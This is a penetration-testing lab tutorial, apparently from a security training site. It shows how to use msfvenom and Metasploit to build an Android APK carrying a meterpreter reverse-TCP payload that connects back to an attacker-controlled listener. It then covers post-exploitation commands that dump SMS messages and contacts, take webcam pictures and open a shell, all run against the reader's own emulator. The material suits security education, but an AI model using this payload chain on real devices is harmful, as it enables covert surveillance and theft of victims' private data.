Android exploitation with Kali
In this tutorial, we shall see how to create an apk file using the tools offered by Kali Linux. Kali Linux is a Linux distro with a preset of hacking tools and frameworks that can serve multiple purposes in various phases of penetration testing. In this tutorial, we shall focus on Metasploit Android-based payloads and msfvenom tool to create the apk file.
Before starting the lab, we shall have the pre-requisites readily installed:
- Oracle VM VirtualBox
- Windows VM Virtual Box where Android emulator would run.
- Kali Linux – VM image
- Android SDK
- Metasploit Framework
Let's begin the lab. This tutorial will guide you through each step with screenshots and commands needed to execute the same.
Earn two pentesting certifications at once!
Enroll in one boot camp to earn both your Certified Ethical Hacker (CEH) and CompTIA PenTest+ certifications — backed with an Exam Pass Guarantee.
Creating an APK and initiating a multi/handler exploit
Step 1:
Open Kali Linux OS on Oracle VM VirtualBox.
Default login: root/toor
Login to the Kali Linux virtual machine using the default credentials given above.
Step 2:
Verify the IP address of the Kali machine.
Command: ifconfig
Open the terminal in the Kali Linux, and note down the IP address of the system. We will be using this IP address in our exploit.
Step 3:
Open Metasploit framework.
From terminal: msfconsole
Once you verify and note down the IP address, we shall open the MSF console to create a listener for our exploit.
Step 4:
Using Metasploit multi/handler.
Command: msf > use exploit/multi/handler
In Metasploit, use command uses a particular model of the framework. In this case, we wish to use the multi/handler exploit, which facilitates listening to an incoming wildcard connection.
Step 5:
Search the payload for the multi handler
Command: msf> search Android/meterpreter
You can use the 'search' command within msfconsole to search for a keyword. In this case, we will search for the Android meterpreter payload.
Step 6:
Set the payload in Metasploit
Command: msf> set payload Android/meterpreter/reverse_tcp
Along with 'use' and 'search' commands, 'set' is another command used in Metasploit to set a particular payload for an exploit.
Step 7:
See the options of the exploit/payload
Command: msf> show options
We can use the command 'show options' to see the various inputs an exploit takes for running successfully.
Step 8:
Set the LHOST and LPORT
Command: msf> set LHOST <ip_address>
msf > set LPORT <port_number>
Step 9:
Start the listener
Command: msf> exploit
Once you type exploit, your listener should be up and running waiting for an incoming wildcard connection.
Step 10:
Make an APK file using MSF venom. Open a new terminal.
Command: msfvenom –p Android/meterpreter/reverse_tcp LHOST=ip_address LPORT=port_number –R > filename.apk
Open a new terminal and type the above command to generate an apk file which will be distributed to the victim. Advanced attacks can be pursued by binding these files with legitimate APKs, which is beyond the scope of this lab.
Setting up the android emulator
To perform this exploit, we need to have an emulator ready where we would be sharing the apk.
Step 1:
Open a VM (preferably Windows OS) and install Android studio from http://developer.Android.com/sdk/index.html
Step 2:
Open the setup file named Android-Studio-bundle-xxxxx-windows and proceed with the installation process.
Step 3:
Verify that Android SDK; Android virtual device is checked in like the screenshot below.
Step 4:
Verify the SDK location is changed to something easily accessible, for example, the same location as Android Studio installation location itself.
Step 5:
Once the installation is complete, navigate to the Android SDK folder on your system. In my case, it's in E:AndroidSDKtools. Open a command window in that location by holding shift + right click > Open command window here.
Step 6:
On cmd enter 'Android' and press enter and wait for the Android SDK manager to load. It looks something like this once it's loaded. Once loaded you can go to Tools > Manage AVDs.
Tip: Verify that the following system images are installed especially the system images.
Step 7:
On clicking manage your AVDs, should land us to the following screen where we would click on create. This will be the initialization of your emulator.
FREE role-guided training plans
Get 12 cybersecurity training plans — one for each of the most common roles requested by employers.
FREE role-guided training plans
Step 8:
Set your Android device as shown below configuration, enabling camera is optional:
Tip: Use mksdcard tool to create memory card for the emulator with the following command by opening the terminal in the tools folder of your sdk:
Step 9:
Press OK and Click Start to launch your Android emulator.
Tip: If there is any error regarding: "CPU acceleration status: HAXM must be updated (version 1.1.1 < 6.0.1)". Install, it from Android SDK Manager by checking Intel Emulator Accelerator (HAXM installer).
Step 10:
Your emulator should be launched after it takes a little time based on your system preferences.
Step 11:
Download the APK/Share the APK to the device.
I had hosted an Apache server to download the apk from a URL. This is very trivial, with basic knowledge of Linux.
Tip: Hosting an apache server on Kali Linux can be done in the following way.
- Open terminal and enter the following command - /etc/init.d/apache2 start
- Then, you can go to the local web server from your Android device browser as http://192.168.1.9/index.html. (Remember to use IP address of your Kali system)
- You can also keep the apk which we generated in the /var/www/html folder as shown in the screenshot below.
Step 12:
Open the URL: http://192.168.1.9/evilAndroid.apk in your Windows VMs browser and copy the apk to the platform-tools folder of Android SDK.
Step 13:
Install the app using ADB (Android Device Bridge).
Hold right click and open the command window in the platform-tools folder. Type the following adb commands to install the apk in the emulator
'adb devices' this command lists all the devices available to be interacted with.
Once we see the device lists, we type the following command to install the apk on the device:
'adb -s emulator-5554 install evilApk.apk' this indicates to adb that on device id: emulator-5554, installation of evilApk.apk is desired.
Step 14:
Open the app on your device by opening MainActivity app on your device.
Once you open the app on your device, the meterpreter should spawn a meterpreter shell connecting to your device.
Post exploitation commands with android on Meterpreter
Step 1:
The meterpreter shell should be opened by now. Let's look at some post exploitation commands.
meterpreter > help
This is the most basic command which enlists all the commands provided by meterpreter to be used at your disposal.
meterpreter > sysinfo
Sys Info is a command used to obtain the host and OS information of the device.
meterpreter > ps
ps is a command used to enlist all the process that are running on the device.
meterpreter > pwd
pwd refers to present working directory. This command is to know the current directory of the device we are in.
meterpreter > webcam_list
This command enlists the list of cameras on the device. To use the camera on the device, we need to enable them in the emulator settings during configuration.
Note: In the above case, we hadn't included them in the configuration.
We can use, webcam_snap 1 or webcam_snap 2 commands to interact with the front or back camera of the device.
meterpreter > shell
The shell command spawns a shell into the device using which you can navigate to the device using any basic Linux commands.
Using your emulator, open the messaging application (SMS app) and create a new message. Send it to your emulator ID (example: 5554) and click send. Similarly, create a dummy contact and save it on the emulator, just like any other Android device.
meterpreter > dump_sms
dump_sms command dumps SMS into a text file on your Kali Linux home directory. Let's have a look at that command in the below screenshots.
We can see that 2 SMS messages are dumped, let's see the contents of these messages.
These are the two outgoing SMS' I had sent from the emulator to self.
meterpreter > dump_contacts
Contacts from contact lists are dumped into a text file on the Kali system. We can have a look at these commands below.
It shows there are two contacts that are extracted from the dump. Let's open the dump file on Kali and check. The file can be found in $Home directory.
Become a Certified Ethical Hacker, guaranteed!
Get training from anywhere to earn your Certified Ethical Hacker (CEH) Certification — backed with an Exam Pass Guarantee.
Exercise for the student:
- Feel free to try this exploit on various versions of Android, as different versions of Android can have a different set of commands which can furnish interesting results.
- Try using the webcam_snap <cam_id> command and get the picture.
----End of Lab----
- 12 pre-built training plans
- Employer-requested skills
- Personalized, hands-on training
In this Series
- Android exploitation with Kali
- Intelligence-led pentesting and the evolution of Red Team operations
- Red Teaming: Taking advantage of Certify to attack AD networks
- How ethical hacking and pentesting is changing in 2022
- Ransomware penetration testing: Verifying your ransomware readiness
- Red Teaming: Main tools for wireless penetration tests
- Fundamentals of IoT firmware reverse engineering
- Red Teaming: Top tools and gadgets for physical assessments
- Red teaming: Initial access and foothold
- Top tools for red teaming
- What is penetration testing, anyway?
- Red Teaming: Persistence Techniques
- Red Teaming: Credential dumping techniques
- Top 6 bug bounty programs for cybersecurity professionals
- Tunneling and port forwarding tools used during red teaming assessments
- SigintOS: Signal Intelligence via a single graphical interface
- Top tools for mobile android assessments
- Top tools for mobile iOS assessments
- Red Team: C2 frameworks for pentesting
- Inside 1,602 pentests: Common vulnerabilities, findings and fixes
- Red teaming tutorial: Active directory pentesting approach and tools
- Red Team tutorial: A walkthrough on memory injection techniques
- Python for active defense: Monitoring
- Python for active defense: Network
- Python for active defense: Decoys
- How to write a port scanner in Python in 5 minutes: Example and walkthrough
- Using Python for MITRE ATT&CK and data encrypted for impact
- Explore Python for MITRE ATT&CK exfiltration and non-application layer protocol
- Explore Python for MITRE ATT&CK command-and-control
- Explore Python for MITRE ATT&CK email collection and clipboard data
- Explore Python for MITRE ATT&CK lateral movement and remote services
- Explore Python for MITRE ATT&CK account and directory discovery
- Explore Python for MITRE ATT&CK credential access and network sniffing
- Top 10 security tools for bug bounty hunters
- Kali Linux: Top 5 tools for password attacks
- Kali Linux: Top 5 tools for post exploitation
- Kali Linux: Top 5 tools for database security assessments
- Kali Linux: Top 5 tools for information gathering
- Kali Linux: Top 5 tools for sniffing and spoofing
- Kali Linux: Top 8 tools for wireless attacks
- Kali Linux: Top 5 tools for penetration testing reporting
- Kali Linux overview: 14 uses for digital forensics and pentesting
- Top 19 Kali Linux tools for vulnerability assessments
- Explore Python for MITRE ATT&CK persistence
- Explore Python for MITRE ATT&CK defense evasion
- Explore Python for MITRE ATT&CK privilege escalation
- Explore Python for MITRE ATT&CK initial access
- Top 18 tools for vulnerability exploitation in Kali Linux
- Explore Python for MITRE PRE-ATT&CK, network scanning and Scapy
- Kali Linux: Top 5 tools for social engineering
- Basic snort rules syntax and usage [updated 2021]
Get certified and advance your career
- Exam Pass Guarantee
- Live instruction
- CompTIA, ISACA, (ISC)², Cisco, Microsoft and more!
Penetration testing
Intelligence-led pentesting and the evolution of Red Team operations
Penetration testing
Red Teaming: Taking advantage of Certify to attack AD networks
Penetration testing
Penetration testing
Ransomware penetration testing: Verifying your ransomware readiness